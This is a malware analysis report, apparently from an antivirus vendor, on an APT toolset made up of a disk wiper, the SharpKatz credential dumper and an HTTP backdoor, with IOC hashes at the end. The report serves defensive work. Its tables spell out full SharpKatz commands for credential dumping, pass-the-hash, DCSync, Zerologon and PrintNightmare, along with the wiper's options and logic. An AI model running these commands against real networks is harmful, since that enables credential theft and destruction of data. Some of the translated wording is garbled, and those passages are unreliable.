HackTool.Win32.APT- PS

1 Technical details

1.1 Modules and malware operation sequences

This malware includes many modules, including executable programs and various scripts, each of which has its small task.

Figure 1 – Malware modules

The following is a list of malware files with a brief description of how they work.

File Name Description
wint.bat Run the scheduler task to run the msdskint.exe file service
msdskint.exe Destroy the hard disk data (Wipe), change users’ passwords, delete Windows backup files, and, etc.
Sharpk.exe A tool for retrieving users’ authentication information
uhsvc.exe As a Httpservice to communicate with c & c servers, the hacker also used this file to copy the Sharpk.exe tool.
Last file Contents of the last corrupted file path

Table 1 – Summary of malware layout performance

1.1.1  Description of the sharpk.exe file operation

The tool is released on Github and implements the Sekurlsa and lsadump modules from mimikatz. Sharpkatz is used to discover useful information from Windows-based hosts.

This tool consists of several modules that are designed for different attack functions. Some commonly used modules are:

MSV, Kerberos, TSPKG, Windows Credential Manager, Wdigest

The main modules that can be run by this tool are as follows:

  • Lsadump

This module is used to extract the hash of a specific user.

  • Pth

With the hash of a specific user, he uses all accesses to steal his username and password. This module does not require Admin access to work properly, and even a normal user can run this module.

  • LogonPasswords

Displays validation information for recently logged-in users.

  • Zerologon (for stealing Active Directory information)

Zerologon Vulnerability or CVE-2020-1472 is one of these vulnerabilities, first reported in September 2021. The vulnerability, caused by Microsoft’s way of implementing encryption on the Netlogon process, allows attackers to attack and steal Windows servers, especially Active Directory servers.

  • DCSync

The DCSync module in sharpkatz allows an attacker to pretend to be a domain controller and retrieve the hash password from other domain controllers without executing code on the target.

The following table lists the arguments that can be downloaded from the sharpk.exe file along with their functionality.

Input Argument Statement
–Command ekeys Displays a list of Kerberos encryption keys (Kerberos is a network authentication protocol)
–Command msv Recover user validation information from msv including logons, batch logons, and service logons
–Command Kerberos Retrieve user credentials from Kerberos
–Command tspkg Retrieve user credentials from tspkg
–Command credman Retrieve user credentials from credman
–Command wdigest Retrieve user credentials from wdigest
–Command logonpasswords Retrieve user credentials from logonpasswords
–Command listshadows View list of system backups
–Command dumpsam –System syspath –Sam Sampath Get dumped from validation information inside the SAM database
–Command pth –User username –Domain userdomain –NtlmHash ntlmhash Create a process under the domain name or username validation by using the ntlm hash of the user password
–Command pth –User username –Domain userdomain –Rc4 rc4key Create a process under the rc4 key of a domain name or username
–Command pth –Luid luid –NtlmHash ntlmhash Replaces the ntlm hash for an existing logonsession.
–Command pth –User username –Domain userdomain –NtlmHash ntlmhash Create a process under the domain name or username validation by using the ntlm hash of the user password
–Command dcsync –User user –Domain userdomain –DomainController dc Get dumped from user credentials by username
–Command dcsync –Guid guid –Domain userdomain –DomainController dc Get dumped from user credentials by guid
–Command dcsync –Domain userdomain –DomainController dc Create a file in the current user temp folder, including information extracted from the AD
–Command dcsync –User user –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword Get dumping of user credentials by username using alternative credentials
–Command dcsync –Guid guid –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword Get dumping of user credentials by username using guid
–Command dcsync –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword Create a file in the current user temp folder, containing information extracted from AD by alternative validation information
–Command zerologon –Mode check –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C $ Investigate the Zerologon vulnerability in the system
–Command zerologon –Mode exploit –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C $ Infiltration using zerologon vulnerability
–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C $ –Domain testlab2.local –User krbtgt –DomainController WIN-NSE5CPtp0 Infiltrate using zerologon vulnerabilities and get dumped from user credentials by username
–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C $ –Domain testlab2.local –Guid guid –DomainController WIN-NSE5CPCPb22.l Infiltration using zerologon vulnerability and dumping of user credentials by GUID
–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C $ –Domain testlab2.local –DomainController WIN-NSE5CPCP07C.testlab Infiltrate using the zerologon vulnerability and create a file in the current user temp folder, including information extracted from AD by an alternative credential
–Command printnightmare –Target dc –Library \\\\ mycontrolled \\ share \\ fun.dll Infiltration using PrintNightmare vulnerability
–Command printnightmare –Target dc –Library \\\\ mycontrolled \\ share \\ fun.dll –AuthUser user –AuthPassword password –AuthDomain dom Infiltration using PrintNightmare vulnerabilities and credentials provided

Table 2 – Description of Sharpkatz tool commands

1.1.2 Description of .NETWSM task operations

This scheduler is responsible for executing the wint.bat file.

c: \ programdata \ pcmr \ wint.bat

1.1.3 Description of the wint.bat file operation

This file is a malicious Wiper service. A service with the fake name of Windows Task Scheduler, which, as the name of the service indicates, uses the word “Taks” instead of the word “Tasks”. The Wiper file named msdskint.exe is found in various systems in the following paths:

HGH-HGH-KHSRAVI system:

c: \ windows \ ccmcache \ 6 \ msdskint.exe

Other systems:

c: \ programdata \ pcmr \ msdskint.exe

1.1.4 Description of msdskint.exe file operation

This file is a Wiper created by a hacker who can receive arguments from the input. If no input argument is entered, the file also has predefined arguments that use the same arguments during execution.

The hacker used this file using the tool “Eziriz.NET Reactor “pack to keep the malware code out of the sight of the analyst and antivirus. The following is a description of malware operations after decoding the program.

The following table lists the arguments that can be downloaded from the sharpk.exe file along with their functionality.

Input Argument Statement
-wipe-exclude Paths after this argument are added to the list of malicious exceptions to prevent a wipe.
-light-wipe The number of times the desired malware buffer to destroy the file‌Sacrifice systems are written.
-sessions Allows all active sessions to be logged off and restarted.
-delete-users The accounts of logged-in users with this argument will be deleted from the system.
-shadows All backups of system data will be erased.
-start-iis The IIS service starts.
-config Operation not defined.
-processes The entered processes end with this argument.
-Logs Malware removes all Event viewer logs using Windows and Enum wevtutil.exe tools.
-delete

If this argument is entered, the files that are wiped will eventually be deleted from the system. (Windows Win32Native.DeleteFile function runs)

-break-users Change the password of the victim system users
-wipe-only Only files in the paths entered are corrupted.
-purge It means a complete cleanup in which the process of destroying the contents of the file is different from the normal process.
-passwords Operation not defined.
-wipe-all Destroy information on all system drives
-stop-iis The IIS service is stopped.

Table 3 – Description of Wiper malware commands

The following is a detailed description of each of the arguments that need further explanation.

  • -Break-users argument

If this argument is entered and a user is specified, the malware sets a password for each of the accounts defined in the system. This is the fixed string password “S7Y1a82R!” is.

Figure 2 – The malware changes the users’ password

  • Argument –purge

This argument is used when wiping files. In general, the amount of malware considered to wipe information is a 200-byte buffer whose contents are randomly generated by an algorithm.

If the purge argument is entered, a value named full_purge is set in the malware code. This item means a complete cleanup for malware. In this case, the procedure for destroying malware on file information is to write the value inside the buffer in 200-byte blocks to the file to reach the end of the file.

The malware also has a list called purgeExtensions in its code, which includes the hacker candidate extensions. In this case, if the file to be destroyed has one of the following extensions, the data destruction process of that file will be the same as the full_purge process.

Figure 3 – Candidate extensions

In addition to the list above, there are other strings in the malware file that can be considered candidate extensions. These extensions are:

.accdb, .cdx, .dmp, .js, .pnf, .rom, .tif, .wmdb, .acl, .cfg, .doc, .hlp, .png, .rpt, .tiff, .wmv, .acm , .chk, .docx, .hpi, .lnk, .pps, .rsp, .tlb, .xdr, .amr, .com, .dot, .ppt, .sam, .tmp, .xls, .apln,. cpl, .drv, .pptx, .scp, .tsp, .xlsx, .asp, .cpx, .dwg, .hxx, .m4a, .pro, .scr, .avi, .dat, .eml, .ico, .mid, .psd, .sdb, .xsd, .ax, .db, .nls, .rar, .sig, .wab, .zip, .bak, .dbf, .ext, .one, .wab ~,. bin, .dbx, .fdb, .jar, .pdf, .rdf, .sqlite, .wav, .bmp, .dll, .gif, .jpg, .pip, .resources, .theme, .wma, .config, .mxf, .mp3, .mp4, .cs, .vb, .tib, .aspx, .pem, .crt, .msg, .mail, .enc, .msi, .cab, .plb, .plt

  • Argument -wipe-all

If this argument is entered, all active system drives are saved in a list. Then all the information on the drives is wiped.

When data is corrupted, 3 files are excluded:

  • default.htm
  • index.htm
  • death_to_raisi.exe

The procedure for destroying data by malware, if the value of full_purge is not set or the file extension is not part of the candidate extensions, is that it first writes a 200-byte buffer of zero offsets to the file. It then divides the total file size by 1024. Stores this value in variable num4.

If a number is entered for the light_wipe argument, it calculates the minimum value between light_wipe and num4 and writes it in num4.

It then spaces 1024 bytes (0X400) by the number 4 times from the current offset and writes the same value over the next 200 bytes, and so on until it reaches the end of the file. Finally, it creates the lastfile2 file in the folder of the corrupted file and writes down the path of the file.

As mentioned earlier, the msdskint.exe file also has predefined arguments if it does not receive an argument as input. This file, if run under service, will have the following default arguments:

Figure 4 – List of strings as input arguments

Based on these arguments, this service will work as follows:

  1. The value of -light-wipe is equal to 3. This means that the data destruction buffer is written to each file 3 times.
  2. The IIS service is stopped.
  3. All EventViewer logs of the Windows operating system are deleted.
  4. All backups will be deleted.
  5. The value of processes – is equal to SQL *. That means the whole process ‌ of SQL strings ends in their names.
  6. All active drive information except corrupted paths is corrupted.
  7. Excluded paths by the hacker are as follows:
"C: \ Windows"

"C: \ $ Recycle.Bin"

"C: \ $ WinREAgent"

"C: \ Config.Msi"

"C: \ MSOCache"

"C: \ Recovery"

"C: \ Program Files \ IBM \ *"

"C: \ System Volume Information"

"C: \ Program Files \ dotnet"

"C: \ Program Files (x86) \ dotnet *"

"C: \ Program Files \ Symantec *"

"C: \ Program Files (x86) \ Symantec *"

"C: \ Program Files (x86) \ Padvish *"

"C: \ Program Files \ Kaspersky *"

"C: \ Program Files (x86) \ Kaspersky *"

"C: \ Program Files \ Microsoft *"

"C: \ Program Files (x86) \ Microsoft *"

"C: \ Program Files \ Windows *"

"C: \ Program Files (x86) \ Windows *"

There is a function in the program commands that indicates that the hacker was sensitive to the antivirus. For example, as shown in Figure 5, the malware monitors the list of processes running on the system. If the rewards service or UI is high among these processes, the malware tries to perform the wipe operation in another way instead of executing its default function for Wipe Information.

The reason for this change in tactics on the part of the malware seems to be an escape from the Padvish behavioral detection system, which the wipe method detects and automatically stops immediately; But in any case, the second method of malware is also detected and stopped by Padvish.

In the second method, the malware tries to create a temporary bat file (tmp.bat) for each of the system files and creates two timed tasks for these temporary files with the system license.

Figure 5 – Antivirus service and UI search by malware

Figure 6 – Change the data destruction method by malware after finding the Padvish antivirus service

The following example shows an example of a bat file created:

Figure 7 – An example of a bat file created to destroy information

As shown in the contents of this bat file, the malware first uses the fsutil tool of the Windows operating system to file a file with null content the size of the file it wanted to destroy (here 3072 bytes) with the qipe extension. has constructed. He then intended to replace this fake file with the original file.

Knowing that Padvish Antivirus can prevent the destruction of system information, the hacker has tried to use another way to delete information using standard system tools. However, the Padvish anti-ransomware component has prevented this type of attack.

There are commands in the program code that indicate that this malware can save the program execution time during the log operation as follows:

In the malware code, strings with the titles “- Excluded”, “- Skipped”, “BreakSelectedUsers”, “DeleteSelectedUsers”, “KillProcesses” and… It is visible. At the end of the operation, this log ends with the string “Finished on” and time recording. However, the hacker did not need to save the log using the Wiper file. Because the code for the Output function, which is responsible for printing the result of the operation, is not provided.

1.1.5 Description of uhsvc.exe file operation

This file acts as an HTTP service for the hacker. Information about the hacker’s commands is stored in two files, uhsvc.exe.start and uhsvc.exe.ini.

This service, which is registered in the system as Microsoft Update Health Host, has commands for downloading and uploading files, as well as connecting to the SQL database and sending the results to a malicious server, and manipulating local files. Various versions of this HTTP service have been found, including 0.1.3vXH and 0.1.4vXH. These versions do not differ in overall performance and accept the same commands.

This file is similar to the Wiper Hacker file using the “Eziriz..NET Reactor “packed. The following results are obtained according to the items observed after decoding the commands:

1.The malware creates a tcpListener in the victim system after running it under the service. The following is a version of the malware that uses port 9399. In the example found from the uhsvc.exe.start file, the hacker allowed incoming packets to port 9399 from outside the network to the victim system in the firewall.

Figure 8 – Content of the uhsvc.exe.start file

2.Malware has the ability to receive different commands from the hacker server and execute them. The malware executes these commands using the cmd tool.

Figure 9 – Execution of hacker commands by Shell

3.Use sqlconnection and sqlCommand functions to execute different queries on the SQL database

4.Create a file

Figure 10 – File creation by a hacker through malware

5.The malware has the ability to zip and unzip the contents of directories, download/upload and, if necessary, delete the hacker files. This malware uses the IonicZip library to compress files.

Figure 11 – Ability to compress/open and delete files

Figure 12 – Ability to manipulate the directories contents

6.Ability to get the proxy address of the server to communicate with it through the commands “p =” and “b =”

Figure 13 – Proxy commands

Figure 14 – Proxy setting

7.Ability to display malware version for the hacker (Hacker has used several versions of Httpservice to implement his operations).

Figure 15 – Display of malware version

8.Ability to display the current path of the malware file (the malware path was “c: \ programdata \ pcmr \ uhsvc.exe”).

9.Ability to create a log file and send it to show possible errors to the hacker

Figure 16 – Creating a log file

Figure 17 – Log file

The following table shows the list of operations supported by the malware:

performance of the Ads code
Shellexecute with #zip support a_1 = s
Run SQL commands a_1 = c
View output and error logs and delete them a_1 = i1
Delete output and error logs a_1 = i2
Run cmd interactively a_1 = i
Shellexecute Cmd =
Show Malware path W_i
Show Malware Version V_i
Act as a proxy and forward connection to another website / infected node P = OR b =
Write any file M = afe = 1
Run SQL commands Con
File Manager (Browse directories, Download / Upload Files,…) PRT
Read / Write based on GET other

Table 4 – Malware Web Service Commands

2 How to encounter the malware

All known examples of this malware are called HackTool.Win32.HTTPbackdoor, HackTool.Win32.SharpKatz and Trojan.Win32.QWipe is detected by Padvish.

In addition, the unique feature of protecting Padvish data by detecting the Wipe function by this malware prevents the malware from destroying the information and terminates its execution.

3 Symptoms of Infection (IOC)

File Name MD5
uhsvc.exe

466832ef3f81f1cc37466be9e1b7c4d2

9fbab064ec583f80dc15e1abc2ebcad3

2529ed634df912d95d52be717560b0b6

cc97e34cf19f56263abd0f89e907cf7a

66e6d3b03613074f38b2a6acff8e8229

94354ecf588835cea2352b873211290e

af029e3168e27394020b3f4315b2419b

2c1e86a5c5c5ad19d64baa66e78af6f1

e633f5ce289cdcbdee93b7c02178fa35

4cc3665c4fb23ace6b0f9b396c66f8e6

uhsvc.exe.start 381d8239561c3714c1b71f0c2df4f57e
msdskint.exe 13e7caebf00dd2315885e1f47030eb3c
wint.bat 0aa3b91d584803a39250742b69173841
Sharpk.exe 3ea25f166bef1bf79c374f16f2e4e29f

 

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>